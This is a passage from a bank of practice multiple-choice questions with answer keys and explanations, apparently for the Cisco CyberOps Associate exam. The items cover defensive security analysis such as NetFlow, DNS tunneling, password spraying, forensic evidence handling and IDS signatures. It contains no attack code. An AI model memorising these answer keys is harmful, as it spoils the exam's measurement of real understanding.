Option B (encryption algorithms) is a technical control standard (e.g., AES-256, RSA-2048) usually found in cryptographic standards or baselines, not in the scope statement. Option E (minimum password length) is a specific configuration requirement belonging in a password or access control standard, not in the scope statement.

Exam trap

Cisco often tests the distinction between a policy's scope (what it covers) and the specific technical controls or standards that implement the policy, so candidates mistakenly select granular technical details like encryption algorithms or password lengths as part of the scope statement.

626
MCQmedium

A security analyst is using NetFlow data to investigate a potential data exfiltration incident. Which NetFlow metric is most useful for identifying large volumes of data being transferred to an external IP address?

A.Source port
B.Destination IP
C.Bytes transferred
D.Packet count
AnswerC

Bytes transferred quantifies the actual data volume moved between endpoints, directly exposing abnormally large outbound transfers to external addresses. Flow counts or packet totals alone cannot reveal payload size, so this metric best satisfies the stem's requirement to identify bulk exfiltration.

Why this answer

The 'Bytes transferred' metric in NetFlow directly quantifies the volume of data sent to a specific destination IP. In a data exfiltration scenario, an unusually high byte count to an external IP is a strong indicator of large-scale data transfer, whereas other metrics like source port or packet count do not directly measure data volume.

Exam trap

Cisco often tests the misconception that packet count is equivalent to data volume, but the trap here is that packet count ignores packet size, making bytes transferred the definitive metric for data volume in exfiltration analysis.

How to eliminate wrong answers

Option A is wrong because the source port is typically a random ephemeral port (e.g., 49152-65535) used for the session and does not indicate data volume or exfiltration intent. Option B is wrong because while the destination IP identifies where data is sent, it alone does not measure the amount of data transferred; a single IP could receive both normal and exfiltration traffic. Option D is wrong because packet count does not account for packet size; a high packet count with small packets (e.g., DNS queries) could be benign, whereas a low packet count with large packets (e.g., 1500-byte MTU) could indicate exfiltration.

627
MCQeasy

An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?

A.Remote administration
B.DNS query
C.FTP file transfer
D.Data exfiltration via SSH
AnswerD

Large outbound transfers to an external IP on TCP port 22 outside business hours indicate SSH tunnelling used to move data out. Port 22 is SSH, so the volume and timing satisfy the exfiltration constraint rather than routine administration.

Why this answer

SSH (TCP port 22) is commonly used for secure remote administration, but the scenario describes large data transfers to an external IP during non-business hours, which is a classic indicator of data exfiltration. Attackers often use SSH tunneling to bypass security controls and exfiltrate data because SSH encrypts the traffic, making it difficult for network monitoring tools to inspect the payload. The combination of high volume, external destination, and off-hours activity strongly suggests malicious data theft rather than legitimate administrative tasks.

Exam trap

Cisco often tests the misconception that SSH is only used for remote administration, causing candidates to overlook the data exfiltration angle when large data transfers occur on port 22 during suspicious hours.

How to eliminate wrong answers

Option A is wrong because remote administration via SSH typically involves interactive sessions or small control commands, not large data transfers; legitimate admins would also likely operate during business hours. Option B is wrong because DNS queries use UDP/TCP port 53, not port 22, and are small packets for name resolution, not bulk data transfer. Option C is wrong because FTP file transfer uses TCP ports 20 and 21, not port 22; while SFTP (SSH File Transfer Protocol) runs over SSH, the question specifies 'FTP file transfer' which refers to the standard FTP protocol.

628
MCQhard

In a risk management process, after identifying risks, the next step is to determine the potential impact and likelihood. This is known as:

A.Risk acceptance
B.Risk mitigation
C.Risk assessment
D.Risk transfer
AnswerC

Risk assessment quantifies each identified risk by evaluating its potential impact and likelihood, directly satisfying the stem's requirement to move beyond identification. Unlike risk analysis, which examines causes, assessment assigns severity ratings that feed prioritisation and treatment decisions within the broader risk management process.

Why this answer

After risks have been identified, the next logical step in the risk management process is to evaluate their potential impact and likelihood. This evaluation is formally known as risk assessment (or risk analysis), which quantifies or qualifies the risk level to prioritize subsequent treatment decisions. In the context of the 200-201 exam, risk assessment is a core component of the NIST SP 800-30 risk management framework.

Exam trap

Cisco often tests the order of the risk management process steps, and the trap here is confusing risk assessment (the evaluation step) with risk mitigation (the treatment step), leading candidates to select 'Risk mitigation' because they think of 'doing something about the risk' immediately after identification.

How to eliminate wrong answers

Option A is wrong because risk acceptance is a risk treatment strategy where an organization acknowledges the risk and chooses to tolerate it without active mitigation, not the step of determining impact and likelihood. Option B is wrong because risk mitigation involves implementing controls to reduce the risk level (e.g., deploying a firewall or patching a vulnerability), which occurs after the risk assessment has been completed. Option D is wrong because risk transfer shifts the financial burden of a risk to a third party (e.g., purchasing cyber insurance), which is also a post-assessment treatment decision, not the evaluation of impact and likelihood.

629
Multi-Selecthard

Which THREE actions are mandatory in the evidence handling process according to standard forensic procedures?

Select 3 answers
A.Document the chain of custody
B.Delete any malware found immediately
C.Use a write blocker when imaging
D.Create a forensic image of the device
E.Reboot the device to clear temporary files
AnswersA, C, D

Documenting the chain of custody records every transfer, handler and storage location of evidence, proving it was not tampered with. This is mandatory because unbroken custody documentation is what makes evidence admissible in legal or disciplinary proceedings.

Why this answer

Option A is correct because documenting the chain of custody is mandatory in forensic procedures; it records who collected, handled, transferred, and stored the evidence, ensuring its integrity and admissibility in legal proceedings. Option C is correct because a write blocker must be used when imaging a device to prevent any modification of the original evidence, preserving its integrity for analysis. Option D is correct because creating a forensic image (a bit-for-bit copy) of the device is essential; it allows analysis to be performed on the copy while the original remains unaltered and preserved as evidence.

Option B is incorrect because deleting malware would alter the evidence and destroy potentially valuable artifacts; malware should be preserved and analyzed, not removed. Option E is incorrect because rebooting the device can modify volatile memory, delete temporary files, and alter system state, which would compromise the evidence and violate forensic soundness.

Exam trap

200-201 often tests the misconception that 'cleaning up' malware or rebooting to stabilize a system is helpful — in forensics, both actions destroy evidence and violate preservation principles.

630
MCQmedium

During an intrusion analysis, an analyst identifies that an attacker used a domain generation algorithm (DGA) to resolve C2 domains. Which of the following traffic patterns is most consistent with DGA?

A.Multiple DNS queries to algorithmically generated domains that result in NXDOMAIN responses
B.Large DNS responses indicating amplification
C.DNS queries to a single domain with high frequency
D.DNS queries with long TTL values
AnswerA

DGA malware rapidly cycles through algorithmically generated domain names, most of which are unregistered, producing bursts of DNS queries answered with NXDOMAIN. This high-volume, high-failure pattern distinguishes DGA activity from normal resolution of legitimate, registered domains.

Why this answer

DGA generates many random-looking domains, many of which will be non-existent (NXDOMAIN) as the attacker cycles through them.

631
MCQhard

During an incident, an analyst finds a workstation that is beaconing to an external IP every 60 seconds using DNS TXT queries. The queries contain long, base64-encoded subdomains. The endpoint has no other suspicious network connections. Which technique is most likely being used?

A.Domain generation algorithm for ransomware
B.Fast flux DNS for phishing
C.DNS tunneling for command-and-control
D.DNS cache poisoning for redirection
AnswerC

DNS tunneling encodes data in DNS queries and responses, often using TXT records and long encoded subdomains, to exfiltrate data or receive commands. The regular 60-second beaconing and base64 payloads in TXT queries are hallmarks of DNS-based command-and-control, which blends with legitimate DNS traffic and often bypasses egress filtering.

Why this answer

The combination of regular beaconing, TXT record use, and base64-encoded subdomains strongly indicates DNS tunneling for command-and-control. Attackers use DNS because it is widely allowed through firewalls and rarely inspected deeply. Detecting it requires monitoring for anomalous query volume, unusually long labels, and consistent timing to a single external resolver.

Exam trap

The trap here is treating any suspicious DNS activity as a DGA, when the encoded TXT payloads and steady beaconing point specifically to tunneling.

632
MCQhard

A security analyst is reviewing a series of failed login attempts on a critical server. The logs show that the source IP addresses are from multiple geographic regions and the usernames tried are all valid employees. The attempts occur every 5 minutes for the past hour. According to the company's security policy, which type of attack is most likely occurring, and what is the best immediate response?

A.Password spraying; enforce multi-factor authentication immediately.
B.Credential stuffing; implement rate limiting.
C.Brute-force attack; add the IPs to a blocklist.
D.Dictionary attack; reset all employee passwords.
AnswerA

Multiple source regions with valid usernames, spaced five minutes apart, indicates password spraying rather than brute force. Enforcing multi-factor authentication immediately neutralises it, since stolen or guessed passwords alone can no longer authenticate valid accounts.

Why this answer

The attack pattern—valid usernames with low-frequency attempts from diverse IPs—is characteristic of password spraying, where an attacker tries a single common password against many accounts to avoid lockout thresholds. The best immediate response is to enforce multi-factor authentication (MFA), which renders the stolen or guessed password insufficient for access, mitigating the attack without relying on IP-based blocking that is ineffective against distributed sources.

Exam trap

Cisco often tests the distinction between password spraying and credential stuffing by focusing on the source of credentials—password spraying uses guessed common passwords, while credential stuffing uses stolen credential pairs from data breaches.

How to eliminate wrong answers

Option B is wrong because credential stuffing uses previously leaked username/password pairs from other breaches, not a single password tried across many valid usernames; rate limiting would help but is not the best immediate response as MFA directly neutralizes the credential misuse. Option C is wrong because a brute-force attack targets a single account with many password attempts, not multiple valid usernames from diverse IPs every 5 minutes; adding IPs to a blocklist is ineffective when the source IPs are numerous and geographically distributed. Option D is wrong because a dictionary attack tries many common passwords against a single account, not a single password across many accounts; resetting all employee passwords is disruptive and unnecessary when MFA can stop the attack immediately.

633
Drag & Dropmedium

Drag and drop the steps for the TCP three-way handshake into the correct order.

Drag or tap steps into the slots.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4

Why this order

The TCP three-way handshake must occur in the order: SYN, SYN-ACK, ACK. This sequence synchronizes sequence numbers and establishes a reliable connection before data transfer. Any deviation breaks protocol rules and prevents connection setup.

634
MCQmedium

A security analyst is reviewing the organization's incident response plan and notices that it does not specify how to handle a situation where a zero-day vulnerability is exploited before a patch is available. The analyst wants to recommend a proactive measure that aligns with the NIST SP 800-61 revision 2 and the CyberOps Associate curriculum. Which of the following should the analyst recommend?

A.Deploy a next-generation firewall with signature-based detection to block all known exploits.
B.Conduct regular vulnerability scans to identify and remediate all unpatched systems.
C.Develop and maintain a playbook for zero-day incident response that includes isolation, monitoring, and temporary workarounds.
D.Implement a bug bounty program to incentivize external researchers to report vulnerabilities.
AnswerC

A zero-day playbook provides predefined steps for containment, such as network segmentation, increased monitoring, and applying vendor-provided mitigations or workarounds. This aligns with NIST SP 800-61's recommendation to have specific procedures for handling incidents when patches are unavailable. It ensures a coordinated and efficient response, reducing the time an attacker has to operate and limiting damage.

Why this answer

The correct recommendation is to develop a zero-day incident response playbook. NIST SP 800-61 emphasizes the importance of having specific procedures for incidents that do not have immediate fixes. A playbook outlines steps for containment, monitoring, and applying temporary mitigations, which are critical when a patch is unavailable.

This proactive measure ensures the organization can respond effectively and minimize impact during a zero-day attack.

Exam trap

The trap here is assuming that vulnerability scanning or signature-based firewalls can protect against zero-day exploits, when they are ineffective without known signatures or patches.

635
MCQhard

An analyst observes a large outbound FTP transfer to an external IP address from a server that normally does not generate such traffic. This is most likely an indicator of:

A.Persistence
B.Lateral movement
C.C2 communication
D.Exfiltration
AnswerD

Anomalous outbound FTP transfers from a server that normally generates no such traffic indicate data being stolen to an external destination. This matches exfiltration, where attackers move collected data out of the environment over file-transfer protocols.

Why this answer

A large outbound FTP transfer to an external IP from a server that normally does not generate such traffic is a classic indicator of data exfiltration — data is being stolen and sent out of the network. The volume, direction (outbound), and anomaly relative to baseline behavior all point to exfiltration rather than other attack phases.

Exam trap

The trap is confusing exfiltration with C2 — candidates see 'external IP' and pick C2, but C2 is low-volume beaconing while exfiltration is bulk outbound data transfer.

How to eliminate wrong answers

Option A is wrong because persistence refers to maintaining access across reboots (e.g., registry run keys, scheduled tasks, cron jobs) — it does not describe bulk outbound data transfer. Option B is wrong because lateral movement is east-west traffic between internal hosts (e.g., SMB, RDP, PsExec), not outbound to an external IP. Option C is wrong because C2 communication is typically low-volume, beaconing traffic to a controller for command and control, not a large one-time FTP transfer of data.

636
MCQmedium

Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?

A.DNS amplification attack
B.ARP spoofing
C.Brute force attempt on Telnet service
D.ICMP flood attack
AnswerC

Repeated denied connections to port 23 indicate automated credential guessing against Telnet, since port 23 is Telnet's default. The pattern of multiple failures from one host to one service is the signature of a brute force attempt rather than a single misconfiguration.

Why this answer

The log shows repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23, which is the default port for Telnet. Multiple failed connection attempts to a Telnet service indicate a brute force attack, where an attacker tries to guess credentials by repeatedly attempting to log in.

Exam trap

Cisco often tests the association of default port numbers with services (port 23 = Telnet) and expects candidates to recognize that repeated connection attempts to a login service indicate a brute force attack, not a flood or spoofing attack.

How to eliminate wrong answers

Option A is wrong because a DNS amplification attack uses spoofed source IPs to send small queries to open DNS resolvers, causing large responses to flood a victim; it does not involve repeated direct connections to port 23. Option B is wrong because ARP spoofing involves sending forged ARP replies to associate the attacker's MAC address with a legitimate IP, enabling man-in-the-middle attacks, not repeated Telnet login attempts. Option D is wrong because an ICMP flood attack overwhelms a target with ICMP echo request packets (ping floods), not with TCP connection attempts to port 23.

637
Multi-Selecteasy

An analyst is investigating a Linux system for persistence mechanisms. Which TWO of the following are common locations for cron-based persistence? (Select TWO)

Select 2 answers
A./var/spool/cron/crontabs/
B./etc/init.d/
C./etc/crontab
D./var/log/cron
E./etc/systemd/system/
AnswersA, C

User crontab files are stored under /var/spool/cron/crontabs/, with one file per user, making it a standard location attackers modify to schedule recurring commands. This satisfies the cron persistence requirement, unlike directories holding system binaries or logs.

Why this answer

Option A (/var/spool/cron/crontabs/) is correct because this is the directory where per-user crontab files are stored on Debian/Ubuntu-style systems, and attackers commonly drop a crontab entry here to run a payload under a specific user account at scheduled intervals. Option C (/etc/crontab) is correct because it is the system-wide crontab file that supports the extra user field and is a frequent target for persistence, since a malicious line added here executes with the specified user's privileges on a recurring schedule. Option B (/etc/init.d/) is not cron-based; it holds SysV init scripts for service startup, not scheduled jobs.

Option D (/var/log/cron) is a log file recording cron activity, useful for detection but not a persistence location. Option E (/etc/systemd/system/) is for systemd unit files, a separate persistence mechanism from cron.

Exam trap

200-201 often tests distinguishing persistence mechanisms by category — candidates confuse cron locations with init/systemd service directories, picking /etc/init.d/ or /etc/systemd/system/ when the question specifically asks about cron.

638
MCQhard

A security manager is drafting a service level agreement (SLA) with a cloud service provider. The SLA must specify the maximum acceptable time for the provider to restore service after a disruption. Which metric should the manager include in the SLA to define this requirement?

A.Mean Time To Repair (MTTR)
B.Mean Time Between Failures (MTBF)
C.Recovery Point Objective (RPO)
D.Recovery Time Objective (RTO)
AnswerD

RTO is the maximum acceptable time to restore a service after a disruption. It directly defines the target for service restoration, making it the correct metric for the SLA. The manager should specify RTO to ensure the provider commits to a restoration timeframe that meets business needs. This aligns with the scenario's requirement.

Why this answer

The Recovery Time Objective (RTO) defines the maximum acceptable time to restore a service after a disruption, making it the correct metric for the SLA. RPO addresses data loss, while MTBF and MTTR are reliability and repair averages, not restoration targets. The manager should specify RTO to ensure the provider meets business continuity requirements.

Exam trap

The trap here is confusing RTO with RPO or with average repair times like MTTR, which do not define the maximum acceptable restoration time.

639
MCQhard

An organization needs to ensure that a document has not been altered and to verify the sender's identity. Which combination of cryptographic techniques should be used?

A.Digital signature and hashing
B.Digital signature and symmetric encryption
C.Symmetric encryption and hashing
D.Asymmetric encryption and hashing
AnswerA

Hashing produces a fixed-length digest that detects any alteration to the document, satisfying the integrity requirement. Signing that hash with the sender's private key lets the recipient verify it using the public key, proving the sender's identity and origin.

Why this answer

A digital signature provides authentication (verifying the sender's identity via their private key) and integrity (proving the document was not altered), while hashing produces the fixed-length digest that the signature signs. Together they satisfy both requirements: the hash detects any modification, and the asymmetric signature binds the document to the sender's private key.

Exam trap

200-201 often tests the pairing of hashing with digital signatures — candidates pick 'asymmetric encryption and hashing' thinking encryption alone authenticates, but only a digital signature binds the sender's identity to the hash.

How to eliminate wrong answers

Option B is wrong because symmetric encryption uses a shared secret key, which cannot prove sender identity (both parties know the key) — it provides confidentiality, not authentication. Option C is wrong because symmetric encryption plus hashing still lacks non-repudiation and sender authentication, since the shared key does not uniquely identify the sender. Option D is wrong because asymmetric encryption alone (without a signature) provides confidentiality but not integrity verification or sender authentication in the sense required — hashing is needed to detect alteration, and the signature is what binds identity to the hash.

640
MCQmedium

A company has implemented a role-based access control (RBAC) policy for its network devices. A network engineer needs temporary access to configure a router in a different region. According to the RBAC policy, what is the appropriate procedure?

A.Have the root password shared via encrypted email to the engineer
B.Use the shared admin account for the duration of the task
C.Ask another engineer with access to perform the configuration changes
D.Submit a request to the security team for temporary role elevation with a specified time limit
AnswerD

RBAC grants permissions by role, so a cross-region router change exceeds the engineer's assigned role. Requesting time-limited role elevation from the security team preserves least privilege while granting the necessary access, matching the policy's temporary requirement.

Why this answer

RBAC policies require that any deviation from assigned roles, such as temporary access to a router in a different region, must be handled through a formal privilege elevation process. This typically involves submitting a request to the security team, who can grant temporary role elevation with a specified time limit, ensuring that access is auditable, time-bound, and revoked automatically. This aligns with the principle of least privilege and maintains the integrity of the RBAC model by avoiding permanent or shared credentials.

Exam trap

Cisco often tests the misconception that sharing credentials or using a shared admin account is acceptable for temporary access, when in reality RBAC mandates formal, auditable, and time-limited role elevation to maintain security and accountability.

How to eliminate wrong answers

Option A is wrong because sharing the root password, even via encrypted email, violates RBAC principles by granting permanent, unmonitored superuser access that bypasses role-based controls and audit trails. Option B is wrong because using a shared admin account undermines RBAC by providing non-repudiation issues and lacks the time-bound, role-specific elevation required for temporary tasks. Option C is wrong because asking another engineer to perform the changes does not resolve the need for the requesting engineer to have direct access; it also introduces potential miscommunication and still requires the other engineer to have appropriate role elevation if they lack the required permissions.

641
Multi-Selectmedium

Which three data sources are commonly used in a SIEM for threat hunting? (Choose three.)

Select 3 answers
A.Firewall logs.
B.Social media feeds.
C.Physical access logs.
D.NetFlow records.
E.DNS query logs.
AnswersA, D, E

Firewall logs show permitted and denied connections.

Why this answer

Firewall logs are a primary data source in SIEM for threat hunting because they record all allowed and denied traffic flows, including source/destination IPs, ports, and protocols. Analyzing these logs helps identify unauthorized access attempts, policy violations, and patterns indicative of lateral movement or data exfiltration.

Exam trap

Cisco often tests the distinction between direct log sources (firewall, NetFlow, DNS) and external threat intelligence or physical security logs, so candidates mistakenly include social media feeds or physical access logs as SIEM data sources.

642
MCQeasy

A security analyst is monitoring network traffic and notices a sudden increase in outbound connections from a single workstation to multiple IP addresses on port 443 at regular intervals. The workstation is used for standard office applications. Which action should the analyst take first?

A.Correlate the connections with firewall logs and endpoint telemetry
B.Immediately block all outbound traffic from the workstation
C.Escalate to the incident response team immediately
D.Isolate the workstation from the network
AnswerA

Correlating firewall logs with endpoint telemetry establishes whether the periodic port 443 connections are legitimate application traffic or beaconing, satisfying the need to validate before containment. This evidence-gathering step distinguishes malicious command-and-control from benign software updates.

Why this answer

The sudden increase in outbound connections to multiple IPs on port 443 (HTTPS) from a single workstation could indicate command-and-control (C2) traffic, data exfiltration, or a compromised system. The first step should be to correlate these connections with firewall logs and endpoint telemetry to gather contextual evidence—such as process names, parent processes, and connection durations—before taking any disruptive action. This aligns with the NIST incident response process (Preparation, Detection & Analysis, Containment, Eradication, Recovery) where analysis precedes containment.

Exam trap

Cisco often tests the candidate's understanding of the incident response process by presenting a plausible but premature containment action (like isolation or blocking) as a distractor, when the correct first step is always to gather and correlate evidence to confirm the threat.

How to eliminate wrong answers

Option B is wrong because immediately blocking all outbound traffic from the workstation is overly aggressive and could disrupt legitimate business operations, such as software updates or cloud application access, without confirming malicious intent. Option C is wrong because escalation to the incident response team should occur after initial analysis and triage, not as the first action; the analyst must first verify the anomaly to avoid false alarms. Option D is wrong because isolating the workstation from the network is a containment step that should be taken only after confirming malicious activity through correlation with logs and telemetry, as premature isolation can hinder forensic data collection and impact productivity.

643
MCQmedium

A SOC analyst monitoring Cisco Stealthwatch Enterprise notices a host inside the network is receiving NetFlow records showing repeated inbound connections on TCP port 3389 from multiple external IP addresses over a short period. The host is a workstation, not a server. Which action should the analyst take first?

A.Restart the workstation to terminate any active RDP sessions and clear potential malware from memory.
B.Block TCP port 3389 inbound on the perimeter firewall for all internal hosts.
C.Investigate the workstation for signs of compromise and determine whether it is running an unauthorized RDP service.
D.Add the external IP addresses to the firewall blocklist and close the incident.
AnswerC

A workstation receiving inbound RDP connections from multiple external IPs is highly suspicious because workstations should not expose RDP to the internet. The analyst should first investigate the endpoint to confirm whether an attacker has enabled RDP or installed a backdoor, gather evidence, and then contain the incident appropriately.

Why this answer

Inbound RDP traffic to a workstation from multiple external sources is a strong indicator that the host may be compromised and running an unauthorized remote access service. The correct first step is to investigate the endpoint to confirm the compromise and gather evidence before taking containment actions. This aligns with the incident response process of identification and scoping before eradication.

Exam trap

The trap here is assuming that blocking the external IPs or the port immediately resolves the incident, when the real issue is the potentially compromised internal host that must be investigated first.

644
MCQeasy

A security analyst analyzes an IDS alert that triggered on the string '/etc/passwd'. What type of signature is this?

A.Stateful signature
B.Composite signature
C.Atomic signature
D.Anomaly signature
AnswerC

An atomic signature matches a single fixed element, here the literal string '/etc/passwd', with no state or context tracking. It triggers on that pattern alone, distinguishing it from stateful or composite signatures that correlate multiple events.

Why this answer

The string '/etc/passwd' is a single, fixed pattern that the IDS matches against a single packet payload. This is the definition of an atomic signature: it looks for a specific content string without requiring any state or context from previous packets. Option C is correct because the alert is triggered solely by the presence of that literal string in a packet, not by any sequence of events or statistical deviation.

Exam trap

Cisco often tests the distinction between atomic and stateful signatures by presenting a single-packet pattern and expecting candidates to recognize that no session tracking is involved, leading some to mistakenly choose 'stateful' because they associate '/etc/passwd' with a multi-step exploit.

How to eliminate wrong answers

Option A is wrong because a stateful signature tracks connection state (e.g., TCP handshake or session flags) and matches patterns across multiple packets, not a single static string. Option B is wrong because a composite signature combines multiple atomic or stateful conditions (e.g., pattern A AND pattern B) to trigger an alert, whereas this is a single condition. Option D is wrong because an anomaly signature uses baseline statistical models (e.g., traffic volume or protocol deviations) to detect outliers, not a fixed literal string like '/etc/passwd'.

645
Multi-Selectmedium

Which TWO are components of the NIST SP 800-61 Rev 2 Preparation phase? (Select two.)

Select 2 answers
A.Conducting lessons learned
B.Developing an incident response plan
C.Containing the incident
D.Creating an incident response team
E.Identifying indicators of compromise
AnswersB, D

Drafting the incident response plan belongs to Preparation: it defines scope, roles, communication paths and playbooks before any incident occurs, satisfying the phase's requirement to establish capability in advance rather than during detection or containment.

Why this answer

Option B (Developing an incident response plan) is correct because NIST SP 800-61 Rev 2 places the creation of a formal, written IR plan—covering mission, goals, roles, communication paths, and escalation procedures—squarely in the Preparation phase, before any incident occurs. Option D (Creating an incident response team) is also correct because staffing and organizing the CSIRT (with defined roles, authority, and on-call procedures) is a core Preparation activity that must exist before incidents can be handled. By contrast, option A (Conducting lessons learned) belongs to the Post-Incident Activity phase, where the team reviews what happened and improves the plan.

Option C (Containing the incident) is part of the Detection and Analysis/Containment, Eradication, and Recovery handling phase, not Preparation. Option E (Identifying indicators of compromise) is a Detection and Analysis activity, since IoCs are used to discover and validate incidents rather than to prepare for them.

646
Multi-Selectmedium

A Windows Event Log analysis reveals Event ID 4720 and 4726 occurrences for the same account within a short time. Which TWO actions were performed? (Select 2)

Select 2 answers
A.User account was locked
B.User account was deleted
C.Group policy was updated
D.User logged on successfully
E.User account was created
AnswersB, E

Event ID 4726 is logged by Windows Security auditing when a user account object is deleted from Active Directory. Its appearance for the same account shortly after creation confirms deletion occurred, matching the stem's request to identify the actions performed.

Why this answer

Event ID 4720 indicates account creation, and 4726 indicates account deletion. The rapid creation and deletion may indicate an attempt to avoid detection or create a temporary account.

647
MCQeasy

A security analyst is reviewing a Windows workstation that is suspected of being infected with malware that establishes persistence. The analyst wants to check a location that is commonly used by malware to automatically start when a user logs on. Which of the following should the analyst examine?

A.The Recycle Bin
B.The Prefetch folder
C.The Windows Defender quarantine folder
D.The Startup folder for the current user
AnswerD

The Startup folder (e.g., %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) contains shortcuts and executables that run automatically when the user logs on. Malware often places a copy or shortcut here to maintain persistence. Checking this folder is a standard step in host-based analysis for user-level persistence.

Why this answer

The Startup folder is a well-known user-level persistence location. Any program or shortcut placed there will execute automatically when the user logs on. Malware frequently uses this folder because it requires no administrative privileges and is easy to implement.

Analysts should check both the per-user Startup folder and the all-users Startup folder for suspicious entries.

Exam trap

The trap here is confusing forensic artifacts that record execution, such as Prefetch, with actual auto-start extensibility points like the Startup folder that cause execution.

648
MCQhard

During an incident response, an analyst extracts a file from network traffic using Zeek's file analysis feature. The file has a SHA-256 hash that matches a known malware indicator. Which type of IoC is this?

A.Behavioral IoC
B.Network-based IoC
C.Host-based IoC
D.File-based IoC
AnswerD

A SHA-256 hash is a cryptographic file fingerprint, so matching it to a known indicator identifies the artefact itself rather than network behaviour or infrastructure. This satisfies the stem's constraint: the IoC derives from the extracted file's content, making it file-based rather than network- or host-based.

Why this answer

A file-based IoC is an indicator derived from a file artifact — such as a hash (MD5, SHA-1, SHA-256), filename, or file path — that identifies malicious content. Since the analyst extracted a file and matched its SHA-256 hash against a known malware indicator, this is a file-based IoC, regardless of the fact that the file was captured from network traffic.

Exam trap

The trap is assuming that because the file was extracted from network traffic, the IoC must be 'network-based' — but the IoC type is determined by the indicator's nature (a file hash), not the collection method.

How to eliminate wrong answers

Option A is wrong because behavioral IoCs describe patterns of activity (e.g., unusual process chains, beaconing intervals) rather than static file attributes like hashes. Option B is wrong because network-based IoCs are indicators tied to network artifacts such as IP addresses, domains, URLs, or JA3 fingerprints — the file's hash is not a network indicator even though it was extracted from traffic. Option C is wrong because host-based IoCs relate to host artifacts like registry keys, file paths on disk, or scheduled tasks, not a hash matched from a captured file.

649
MCQmedium

A network intrusion detection system (NIDS) generates an alert for a known exploit against a web server. The analyst verifies that the server is patched. What is the next best step?

A.Reconfigure the NIDS to block the traffic
B.Tune the signature to ignore the server
C.Dismiss the alert as a false positive
D.Investigate if the exploit was actually attempted
AnswerD

A patched server cannot be exploited, so the alert may be a false positive or a probe. Confirming whether the exploit traffic actually reached and was attempted against the host distinguishes benign scanning from genuine attack activity before escalation or closure.

Why this answer

The alert indicates a known exploit signature was triggered against the web server. Even though the server is patched, the NIDS alert means the exploit attempt was observed on the network. The next best step is to investigate whether the exploit was actually attempted, because the patch may have blocked it, but the attempt itself is still a security event that warrants investigation.

This aligns with the incident response process: verify, contain, and remediate. Dismissing or tuning without investigation could miss a real attack or a compromised system.

Exam trap

The trap here is assuming that a patched server means the alert is a false positive and can be dismissed or tuned out, when in fact the alert indicates an attempt that must be investigated to confirm no compromise occurred.

How to eliminate wrong answers

Option A is wrong because reconfiguring the NIDS to block traffic is a containment action that should only be taken after confirming the threat is active and understanding the scope; blocking without investigation could disrupt legitimate traffic or fail to address the root cause. Option B is wrong because tuning the signature to ignore the server is a suppression technique that should only be used after confirming the alert is a false positive and that the server is not at risk; here the server is patched but the attempt still occurred, so ignoring it could hide future successful exploits. Option C is wrong because dismissing the alert as a false positive is premature; the alert is not necessarily a false positive—the exploit was attempted, but the patch prevented success.

A false positive would mean the signature triggered incorrectly, but here the signature correctly detected an attempt.

650
MCQeasy

A company wants to ensure that only authorized employees can enter the server room. Which type of control is a badge reader at the door?

A.Detective technical control
B.Corrective administrative control
C.Preventive physical control
D.Compensating logical control
AnswerC

A badge reader at the server room door is a preventive physical control because it stops unauthorized individuals from entering before access is granted. It enforces physical access restrictions by requiring a valid credential, thereby reducing the likelihood of unauthorized entry. This aligns with the goal of ensuring only authorized employees can enter, making it a preventive physical control rather than a detective or administrative one.

Why this answer

A badge reader restricts entry to a physical space by requiring valid credentials, so it functions as a preventive physical control. Preventive controls stop incidents before they happen, which matches the goal of allowing only authorized employees into the server room. Detective controls identify events after the fact, corrective controls restore operations, and compensating controls substitute for other measures.

Administrative and logical controls address policies and data rather than physical door access.

Exam trap

The trap here is focusing on the logs a badge reader produces and calling it detective, when its primary purpose is to prevent unauthorized physical entry.

651
MCQmedium

An analyst is reviewing Snort alerts and notices repeated 'ET SCAN Potential SSH Scan' alerts from the same source IP. Which action should the analyst take next?

A.Correlate with authentication logs to confirm unsuccessful attempts.
B.Run a vulnerability scan on the destination.
C.Ignore because it is a false positive.
D.Immediately block the IP on the firewall.
AnswerA

Correlating with authentication logs confirms whether the SSH scan produced actual failed login attempts, distinguishing reconnaissance from a genuine brute-force attempt. This satisfies the stem's need to validate Snort's scan signature against host-level evidence before escalating, since scan alerts alone cannot confirm exploitation or credential compromise.

Why this answer

Snort alerts for 'ET SCAN Potential SSH Scan' indicate a pattern of connection attempts to the SSH port (TCP/22), but the alert alone does not confirm whether the attempts were successful or malicious. Correlating with authentication logs (e.g., /var/log/auth.log or Windows Event ID 4625) allows the analyst to verify failed login attempts, which is the definitive evidence of an actual SSH brute-force attack. This step aligns with the network intrusion analysis methodology of validating alerts before taking action.

Exam trap

Cisco often tests the principle that alerts must be validated with additional data sources (like logs) before taking action, trapping candidates who jump to blocking or ignoring based on the alert alone.

How to eliminate wrong answers

Option B is wrong because running a vulnerability scan on the destination does not help confirm or deny the SSH scan activity; it assesses system weaknesses, not the legitimacy of the incoming connection attempts. Option C is wrong because dismissing the alert as a false positive without investigation is premature; repeated SSH scan alerts from the same source IP often indicate a real reconnaissance or brute-force attempt, and ignoring them could lead to a security breach. Option D is wrong because immediately blocking the IP on the firewall is an overly aggressive response without first verifying that the activity is malicious; the source IP could be a legitimate scanner or a misconfigured monitoring tool, and blocking it prematurely could disrupt operations or hide the true nature of the traffic.

652
MCQmedium

A company uses Cisco Firepower NGFW with intrusion prevention. The security team notices that some legitimate traffic is being blocked by the IPS, causing application outages. The analyst reviews the IPS signature events and finds false positives. What is the best approach to handle this without reducing security posture?

A.Lower the severity of the signature to informational.
B.Disable the IPS signature that is causing the false positives.
C.Create a custom rule to exclude the affected traffic based on source/destination, while monitoring the signature for true positives.
D.Update the IPS signature database to the latest version.
AnswerC

A custom rule scoped to the specific source and destination suppresses the false positive for that traffic only, preserving the signature's protection everywhere else. Monitoring retains visibility, so genuine malicious matches are still detected, avoiding a blanket disable that would weaken posture.

Why this answer

It allows the security team to selectively exclude only the specific legitimate traffic causing false positives, using source/destination criteria in a custom rule, while keeping the IPS signature active for all other traffic. This approach maintains the overall security posture by still detecting true positives from the same signature against other traffic flows. Disabling or lowering the signature's severity would globally reduce detection capability, and updating the database may not address a signature that is inherently too broad for the environment.

Exam trap

